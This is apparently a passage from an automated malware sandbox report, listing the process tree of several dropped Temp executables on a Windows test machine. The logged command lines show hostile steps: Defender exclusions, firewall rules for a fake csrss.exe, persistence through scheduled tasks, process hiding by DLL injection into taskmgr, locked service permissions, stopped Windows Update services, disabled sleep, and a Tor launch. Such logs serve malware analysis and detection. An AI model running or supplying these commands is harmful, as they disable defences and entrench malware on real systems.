  PID:7044
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:7908
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:7972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7972 -s 540
      4⤵
      Program crash
      PID:8148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff88d2346f8,0x7ff88d234708,0x7ff88d234718
1⤵
PID:2144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff88d2346f8,0x7ff88d234708,0x7ff88d234718
1⤵
PID:452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff88d2346f8,0x7ff88d234708,0x7ff88d234718
1⤵
PID:684

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff88d2346f8,0x7ff88d234708,0x7ff88d234718
1⤵
PID:5616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff88d2346f8,0x7ff88d234708,0x7ff88d234718
1⤵
PID:6356

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,6890523316761324845,5146882153916469886,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:3
1⤵
PID:5584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,6223748213854022651,10178350204295528103,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
1⤵
PID:2676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,6223748213854022651,10178350204295528103,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
1⤵
PID:660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7972 -ip 7972
1⤵
PID:8048

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2864

C:\Users\Admin\AppData\Local\Temp\26EC.exe
C:\Users\Admin\AppData\Local\Temp\26EC.exe
1⤵
PID:7224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
  2⤵
  PID:7172
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff88d2346f8,0x7ff88d234708,0x7ff88d234718
    3⤵
    PID:5168
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,3659995970598150490,13500493618668345275,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:8
    3⤵
    PID:4340
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,3659995970598150490,13500493618668345275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
    3⤵
    PID:7752
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,3659995970598150490,13500493618668345275,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
    3⤵
    PID:7740
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,3659995970598150490,13500493618668345275,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
    3⤵
    PID:8008
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,3659995970598150490,13500493618668345275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
    3⤵
    PID:8004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,3659995970598150490,13500493618668345275,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
    3⤵
    PID:6260
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,3659995970598150490,13500493618668345275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
    3⤵
    PID:6264
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,3659995970598150490,13500493618668345275,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
    3⤵
    PID:6616
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,3659995970598150490,13500493618668345275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
    3⤵
    PID:7440
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,3659995970598150490,13500493618668345275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
    3⤵
    PID:6900
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,3659995970598150490,13500493618668345275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5508 /prefetch:8
    3⤵
    PID:732
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,3659995970598150490,13500493618668345275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5508 /prefetch:8
    3⤵
    PID:5548

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1404

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7144

C:\Users\Admin\AppData\Local\Temp\3D05.exe
C:\Users\Admin\AppData\Local\Temp\3D05.exe
1⤵
PID:8160
- C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
  "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
  2⤵
  PID:4688
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    PID:5528
- C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
  "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
  2⤵
  PID:5504
- - C:\Users\Admin\AppData\Local\Temp\Broom.exe
    C:\Users\Admin\AppData\Local\Temp\Broom.exe
    3⤵
    PID:6412
- C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
  "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
  2⤵
  PID:6116
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    PID:6072
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    PID:8140
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:5652
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:3332
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:6680
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:7476
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      PID:2660
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:2192
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5692
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        5⤵
        
        PID:5996
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:3736
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:7484
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        
        PID:3088
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:7888
    - - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        5⤵
        
        PID:3220
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        
        PID:1680
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        
        PID:7536
      - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        Launches sc.exe
        
        PID:6748
- C:\Users\Admin\AppData\Local\Temp\forc.exe
  "C:\Users\Admin\AppData\Local\Temp\forc.exe"
  2⤵
  PID:7688
- C:\Users\Admin\AppData\Local\Temp\latestX.exe
  "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
  2⤵
  PID:5704

C:\Users\Admin\AppData\Local\Temp\4207.exe
C:\Users\Admin\AppData\Local\Temp\4207.exe
1⤵
PID:6068
- C:\Users\Admin\AppData\Local\Temp\4207.exe
  C:\Users\Admin\AppData\Local\Temp\4207.exe
  2⤵
  PID:3664

C:\Users\Admin\AppData\Local\Temp\7F5F.exe
C:\Users\Admin\AppData\Local\Temp\7F5F.exe
1⤵
PID:2308
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
  2⤵
  PID:4892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:7944

C:\Users\Admin\AppData\Local\Temp\C3FB.exe
C:\Users\Admin\AppData\Local\Temp\C3FB.exe
1⤵
PID:6168
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  2⤵
  PID:6508
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    3⤵
    PID:7556
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,1654126776937421915,5594463231114522187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
      4⤵
      PID:548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,1654126776937421915,5594463231114522187,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
      4⤵
      PID:5760
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,1654126776937421915,5594463231114522187,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
      4⤵
      PID:4392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,1654126776937421915,5594463231114522187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
      4⤵
      PID:7460
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,1654126776937421915,5594463231114522187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
      4⤵
      PID:8112
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,1654126776937421915,5594463231114522187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
      4⤵
      PID:5808
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,1654126776937421915,5594463231114522187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:1
      4⤵
      PID:5796
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,1654126776937421915,5594463231114522187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3480 /prefetch:8
      4⤵
      PID:3892
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,1654126776937421915,5594463231114522187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3480 /prefetch:8
      4⤵
      PID:6788
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,1654126776937421915,5594463231114522187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2512 /prefetch:1
      4⤵
      PID:7656
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,1654126776937421915,5594463231114522187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:1
      4⤵
      PID:7224
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,1654126776937421915,5594463231114522187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
      4⤵
      PID:6704

C:\Users\Admin\AppData\Local\Temp\C7D4.exe
C:\Users\Admin\AppData\Local\Temp\C7D4.exe
1⤵
PID:1768
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1768 -s 784
  2⤵
  - Program crash
  PID:7188

C:\Users\Admin\AppData\Local\Temp\C98B.exe
C:\Users\Admin\AppData\Local\Temp\C98B.exe
1⤵
PID:5812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1768 -ip 1768
1⤵
PID:7312

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:7108
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1584
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6388
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2384
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:8064
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:8148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:7296

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5056
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:2208
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:8132
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:5680
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:548

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:6516

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:8100

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
1⤵
PID:7200

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:5600

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
- Launches sc.exe
